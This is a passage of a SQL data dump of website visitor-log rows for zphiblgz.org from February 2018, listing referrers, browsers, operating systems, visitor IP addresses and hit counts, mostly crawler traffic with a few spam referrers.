0','','208.80.194.28','000',1,0),(21572,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.56','000',2,0),(21573,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.198','000',2,0),(21574,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.220','000',1,0),(21575,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.205','000',1,0),(21576,'2018-02-13','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.185','000',5,0),(21577,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.216','000',2,0),(21578,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.60','000',3,0),(21579,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.167','000',1,0),(21580,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.32','000',1,0),(21581,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.45','000',1,0),(21582,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.151.86','000',1,0),(21583,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.49','000',1,0),(21584,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.50','000',3,0),(21585,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.90','000',1,0),(21586,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.51','000',2,0),(21587,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.200','000',1,0),(21588,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.203','000',1,0),(21589,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.82','000',1,0),(21590,'2018-02-13','https://zphiblgz.org','MSIE','Windows','11.0','','172.82.185.210','000',2,0),(21591,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.166','000',2,0),(21592,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.197','000',2,0),(21593,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.69','000',2,0),(21594,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.20','000',1,0),(21595,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.209','000',1,0),(21596,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.82','000',1,0),(21597,'2018-02-13','https://zphiblgz.org','Firefox','Macintosh','5.0.1','','208.80.194.29','000',1,0),(21598,'2018-02-13','https://zphiblgz.org','Chrome','Windows','11.0.696.68','','208.80.194.29','000',1,0),(21599,'2018-02-13','https://zphiblgz.org','Chrome','Windows','10.0.648.151','','208.80.194.29','000',1,0),(21600,'2018-02-13','https://www.google.com/','Chrome','Windows','63.0.3239.132','','162.196.24.249','000',4,0),(21601,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.115','000',3,0),(21602,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.64','000',1,0),(21603,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.121.117','000',1,0),(21604,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.106','000',2,0),(21605,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.205','000',1,0),(21606,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.39','000',2,0),(21607,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.24','000',1,0),(21608,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.55','000',2,0),(21609,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.146.211','000',1,0),(21610,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.146.28','000',1,0),(21611,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.79.115','000',1,0),(21612,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.101','000',2,0),(21613,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.142','000',1,0),(21614,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.202','000',2,0),(21615,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.150','000',1,0),(21616,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.146','000',1,0),(21617,'2018-02-13','https://zphiblgz.org','Firefox','Windows','36.0','','138.210.192.208','000',1,0),(21618,'2018-02-13','74.220.219.51','Firefox','Windows','33.0','','159.203.81.93','000',1,0),(21619,'2018-02-13','https://zphiblgz.org','Safari','Macintosh','10.1.2','','71.179.81.192','000',1,0),(21620,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.217','000',2,0),(21621,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.25','000',1,0),(21622,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.80','000',1,0),(21623,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.23','000',2,0),(21624,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.67','000',2,0),(21625,'2018-02-13','https://zphiblgz.org/scholarship/','AppleWebKit','Windows','534','','199.30.24.210','000',1,0),(21626,'2018-02-13','https://zphiblgz.org','MSIE','Windows','9.0','','34.209.175.228','000',3,0),(21627,'2018-02-13','https://owa.howardcc.edu/owa/redir.aspx?REF=1J4b1_ko32a_eqivgA86sd0TxWaejpQPv3N5u5NX2RIoYlA9qG3VCAFodHRwczovL3pwaGlibGd6Lm9yZy9zY2hvbGFyc2hpcC8.','Safari','iPad','11.0','','71.121.163.58','000',2,0),(21628,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.23','000',1,0),(21629,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.151.241','000',3,0),(21630,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.138','000',1,0),(21631,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.79.116','000',1,0),(21632,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.80.113','000',1,0),(21633,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.80.119','000',1,0),(21634,'2018-02-13','https://zphiblgz.org','Firefox','Windows','58.0','','198.51.197.42','000',5,0),(21635,'2018-02-13','https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwibk-q0j6TZAhWrnOAKHY-hBF0QFggqMAA&url=https%3A%2F%2Fzphiblgz.org%2F&usg=AOvVaw3q4W_LfCjivY3GRWBdIE5d','MSIE','Windows','11.0','','198.51.197.42','000',1,0),(21636,'2018-02-13','https://www.google.com/','Chrome','Windows','64.0.3282.140','','198.51.197.42','000',1,0),(21637,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.200','000',1,0),(21638,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.9','000',1,0),(21639,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.88','000',1,0),(21640,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.215','000',1,0),(21641,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.215','000',1,0),(21642,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.207','000',4,0),(21643,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.185','000',1,0),(21644,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.96','000',1,0),(21645,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.249','000',2,0),(21646,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.6','000',2,0),(21647,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.58','000',1,0),(21648,'2018-02-13','https://zphiblgz.org','MSIE','Windows','6.0','','5.188.211.16','000',1,0),(21649,'2018-02-13','https://zphiblgz.org','Edge','Windows','16.16299','','68.134.9.53','000',4,0),(21650,'2018-02-13','http://zphiblgz.org','Firefox','Windows','3.6.8','','89.234.68.91','000',10,0),(21651,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.85','000',1,0),(21652,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.209','000',2,0),(21653,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.202','000',2,0),(21654,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.72','000',1,0),(21655,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.122','000',2,0),(21656,'2018-02-13','https://vkonche.com/','MSIE','Windows','6.0','','46.119.123.218','000',2,0),(21657,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.217','000',3,0),(21658,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.201','000',1,0),(21659,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.222','000',1,0),(21660,'2018-02-13','https://zphiblgz.org','Safari','iPhone','11.0','','68.134.155.24','000',4,0),(21661,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.146.229','000',2,0),(21662,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.146.31','000',2,0),(21663,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.66','000',1,0),(21664,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.146.25','000',1,0),(21665,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.141','000',2,0),(21666,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.214','000',2,0),(21667,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.126','000',1,0),(21668,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.36','000',2,0),(21669,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.143','000',3,0),(21670,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.182','000',1,0),(21671,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.105.112','000',2,0),(21672,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.129','000',1,0),(21673,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.29','000',1,0),(21674,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.231','000',2,0),(21675,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.48','000',1,0),(21676,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.168','000',2,0),(21677,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.203','000',1,0),(21678,'2018-02-13','http://zphiblgz.org/scholarship/','Edge','Windows','15.15063','','71.121.163.209','000',2,0),(21679,'2018-02-13','https://zphiblgz.org','panscient','Unknown','Unknown','','100.35.47.77','000',83,0),(21680,'2018-02-13','https://zphiblgz.org','Firefox','Windows','40.1','','223.25.18.182','000',2,0),(21681,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.53','000',3,0),(21682,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.167','000',3,0),(21683,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.187','000',2,0),(21684,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.215','000',1,0),(21685,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.200','000',1,0),(21686,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.185.117','000',1,0),(21687,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.17','000',1,0),(21688,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.133','000',1,0),(21689,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.91.170','000',2,0),(21690,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.92.245','000',2,0),(21691,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.92.24','000',2,0),(21692,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.92.242','000',1,0),(21693,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.89.87','000',1,0),(21694,'2018-02-13','https://zphiblgz.org','MSIE','Windows','6.0','','5.188.211.21','000',1,0),(21695,'2018-02-13','https://zphiblgz.org/','Firefox','Windows','50.0','','77.120.125.23','000',2,0),(21696,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.189','000',2,0),(21697,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.81','000',1,0),(21698,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.60','000',3,0),(21699,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.224','000',1,0),(21700,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.97.117','000',1,0),(21701,'2018-02-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','35.205.81.110','000',4,0),(21702,'2018-02-14','https://zphiblgz.org','Chrome','Windows','11.0.696.68','','208.80.194.30','000',1,0),(21703,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.29','000',2,0),(21704,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.26','000',3,0),(21705,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.121.115','000',1,0),(21706,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.82','000',2,0),(21707,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.196','000',1,0),(21708,'2018-02-14','https://zphiblgz.org','Firefox','Windows','21.0','','5.9.17.118','000',1,0),(21709,'2018-02-14','https://zphiblgz.org','Firefox','Linux','21.0','','5.9.17.118','000',1,0),(21710,'2018-02-14','https://zphiblgz.org','Firefox','Linux','17.0','','5.9.17.118','000',1,0),(21711,'2018-02-14','https://hentai-manga.porn/','Unknown','Unknown','Unknown','','46.119.123.218','000',3,0),(21712,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','35.187.30.131','000',4,0),(21713,'2018-02-14','http://sildenafil-tadalafil.info/','MSIE','Windows','6.0','','46.118.225.78','000',7,0),(21714,'2018-02-14','https://zphiblgz.org','Safari','iPhone','7.0','','199.30.25.179','000',1,0),(21715,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','35.187.43.123','000',4,0),(21716,'2018-02-14','https://zphiblgz.org','Chrome','Windows','9.0.597.94','','208.80.194.31','000',1,0),(21717,'2018-02-14','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','13.56.229.65','000',2,0),(21718,'2018-02-14','https://zphiblgz.org','Firefox','Windows','4.0.1','','208.80.194.32','000',1,0),(21719,'2018-02-14','https://zphiblgz.org','Chrome','Windows','10.0.648.151','','208.87.233.140','000',1,0),(21720,'2018-02-14','https://zphiblgz.org','Chrome','Linux','5.0.375.53','','208.80.194.29','000',1,0),(21721,'2018-02-14','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.29','000',2,0),(21722,'2018-02-14','https://zphiblgz.org','Firefox','Windows','40.1','','79.122.91.74','000',2,0),(21723,'2018-02-14','https://zphiblgz.org','Firefox','Windows','40.1','','78.99.6.166','000',2,0),(21724,'2018-02-14','http://site.ru','Chrome','Windows','5.0.375.99','','176.9.31.154','000',1,0),(21725,'2018-02-14','https://zphiblgz.org','Safari','Macintosh','5.1','','208.80.194.29','000',1,0),(21726,'2018-02-14','https://zphiblgz.org','Chrome','Macintosh','14.0.835.202','','208.80.194.29','000',1,0),(21727,'2018-02-14','https://zphiblgz.org','Chrome','Windows','62.0.3202.94','','104.144.53.95','000',1,0),(21728,'2018-02-14','https://zphiblgz.org','Opera','Windows','8.50','','104.144.53.95','000',1,0),(21729,'2018-02-14','http://site.ru','Chrome','Windows','5.0.375.99','','91.98.103.46','000',2,0),(21730,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.95.31','000',1,0),(21731,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.88.245','000',2,0),(21732,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.88.10','000',1,0),(21733,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.92.209','000',3,0),(21734,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.88.4','000',1,0),(21735,'2018-02-14','https://zphiblgz.org','Chrome','Windows','64.0.3282.168','','208.76.113.2','000',6,0),(21736,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.159.119','000',1,0),(21737,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.19','000',1,0),(21738,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.97.118','000',4,0),(21739,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.51','000',1,0),(21740,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.206','000',2,0),(21741,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.73','000',1,0),(21742,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.159.117','000',1,0),(21743,'2018-02-14','https://zphiblgz.org','Firefox','Windows','56.0','','188.165.192.220','000',2,0),(21744,'2018-02-14','https://zphiblgz.org','Firefox','Windows','56.0','','190.2.18.70','000',3,0),(21745,'2018-02-14','https://zphiblgz.org','Chrome','Windows','64.0.3282.140','','66.250.190.48','000',5,0),(21746,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.185','000',2,0),(21747,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.26','000',1,0),(21748,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.85','000',2,0),(21749,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.84','000',1,0),(21750,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.19','000',2,0),(21751,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.120','000',1,0),(21752,'2018-02-14','https://zphiblgz.org','Safari','iPhone','7.0','','65.55.210.93','000',1,0),(21753,'2018-02-14','https://zphiblgz.org','Firefox','Windows','57.0','','52.165.148.51','000',1,0),(21754,'2018-02-14','http://site.ru','Chrome','Windows','5.0.375.99','','23.91.71.233','000',2,0),(21755,'2018-02-14','https://zphiblgz.org','Firefox','Windows','40.1','','103.12.116.14','000',2,0),(21756,'2018-02-14','http://zphiblgz.org/cache/v12/get_started','Firefox','Windows','3.6.8','','89.234.68.108','000',10,0),(21757,'2018-02-14','http://site.ru','Chrome','Windows','5.0.375.99','','80.252.110.99','000',2,0),(21758,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.117','000',3,0),(21759,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.193','000',1,0),(21760,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.120','000',1,0),(21761,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.6','000',3,0),(21762,'2018-02-14','http://www.zphiblgz.org','Unknown','Unknown','Unknown','','138.197.13.208','000',19,0),(21763,'2018-02-14','https://www.google.com/','Chrome','Windows','64.0.3282.140','','131.171.200.183','000',2,0),(21764,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.113','000',4,0),(21765,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.205','000',6,0),(21766,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.193','000',2,0),(21767,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.217','000',1,0),(21768,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.198','000',2,0),(21769,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.20','000',2,0),(21770,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.126','000',3,0),(21771,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.203','000',2,0),(21772,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.37','000',1,0),(21773,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.17','000',3,0),(21774,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.204','000',1,0),(21775,'2018-02-14','https://zphiblgz.org','Chrome','Macintosh','62.0.3202.94','','52.165.166.139','000',2,0),(21776,'2018-02-14','https://zphiblgz.org','Firefox','Windows','54.0','','50.225.39.92','000',7,0),(21777,'2018-02-14','https://zphiblgz.org','Chrome','Unknown','64.0.3264.0','','138.197.111.48','000',3,0),(21778,'2018-02-14','https://zphiblgz.org/trackback/','Safari','iPad','4.0.4','','5.101.140.237','000',1,0),(21779,'2018-02-14','http://www.google.com','Firefox','Windows','3.0.14','','78.50.255.87','000',1,0),(21780,'2018-02-14','https://www.google.com/','Chrome','Windows','63.0.3239.132','','167.102.191.10','000',15,0),(21781,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.213','000',1,0),(21782,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.87','000',2,0),(21783,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.223','000',1,0),(21784,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.203','000',2,0),(21785,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.218','000',2,0),(21786,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.207','000',2,0),(21787,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.179','000',1,0),(21788,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.58','000',1,0),(21789,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.200','000',2,0),(21790,'2018-02-14','https://zphiblgz.org','Firefox','Macintosh','52.0','','50.225.39.71','000',2,0),(21791,'2018-02-14','https://zphiblgz.org','Firefox','Windows','40.1','','160.179.66.60','000',2,0),(21792,'2018-02-14','https://zphiblgz.org','ok','Unknown','3.2.0','','54.227.114.70','000',2,0),(21793,'2018-02-14','http://site.ru','Chrome','Windows','5.0.375.99','','216.172.172.35','000',1,0),(21794,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.68','000',1,0),(21795,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.82','000',1,0),(21796,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.85','000',1,0),(21797,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.207','000',1,0),(21798,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.198','000',2,0),(21799,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.83','000',2,0),(21800,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.60','000',1,0),(21801,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.116','000',2,0),(21802,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.55','000',1,0),(21803,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.124','000',2,0),(21804,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.22','000',1,0),(21805,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.69','000',1,0),(21806,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.88','000',3,0),(21807,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.205','000',3,0),(21808,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.215','000',1,0),(21809,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.203','000',2,0),(21810,'2018-02-14','https://zphiblgz.org','Firefox','Windows','40.1','','37.142.139.219','000',2,0),(21811,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.87','000',1,0),(21812,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.55','000',3,0),(21813,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.81','000',2,0),(21814,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.17','000',1,0),(21815,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.78','000',1,0),(21816,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.224','000',2,0),(21817,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.81','000',1,0),(21818,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.116','000',1,0),(21819,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.194','000',1,0),(21820,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.211','000',1,0),(21821,'2018-02-14','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.35','000',2,0),(21822,'2018-02-14','https://zphiblgz.org','MSIE','Windows','6.0','','208.80.194.35','000',1,0),(21823,'2018-02-14','https://zphiblgz.org','Firefox','Windows','3.6.8','','208.80.194.32','000',1,0),(21824,'2018-02-14','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.184','000',5,0),(21825,'2018-02-14','https://zphiblgz.org','Chrome','Linux','12.0.742.100','','208.80.194.27','000',1,0),(21826,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.7','000',3,0),(21827,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.83','000',2,0),(21828,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.112','000',1,0),(21829,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.88','000',1,0),(21830,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.22','000',1,0),(21831,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.116','000',1,0),(21832,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.209','000',2,0),(21833,'2018-02-14','https://zphiblgz.org','Firefox','Windows','45.0','','185.213.210.128','000',2,0),(21834,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.145.151','000',1,0),(21835,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.154','000',2,0),(21836,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.145.148','000',1,0),(21837,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.145.155','000',2,0),(21838,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.28','000',1,0),(21839,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.148.168','000',1,0),(21840,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.178','000',3,0),(21841,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.185','000',1,0),(21842,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.174','000',2,0),(21843,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.201','000',2,0),(21844,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.53','000',3,0),(21845,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.89','000',1,0),(21846,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.112','000',1,0),(21847,'2018-02-14','https://zphiblgz.org','Chrome','Macintosh','14.0.835.202','','208.80.194.28','000',1,0),(21848,'2018-02-14','http://m.facebook.com','AppleWebKit','iPhone','604.4.7','','96.244.213.109','000',1,0),(21849,'2018-02-14','http://www.zphibmaryland.org/chapters/','MSIE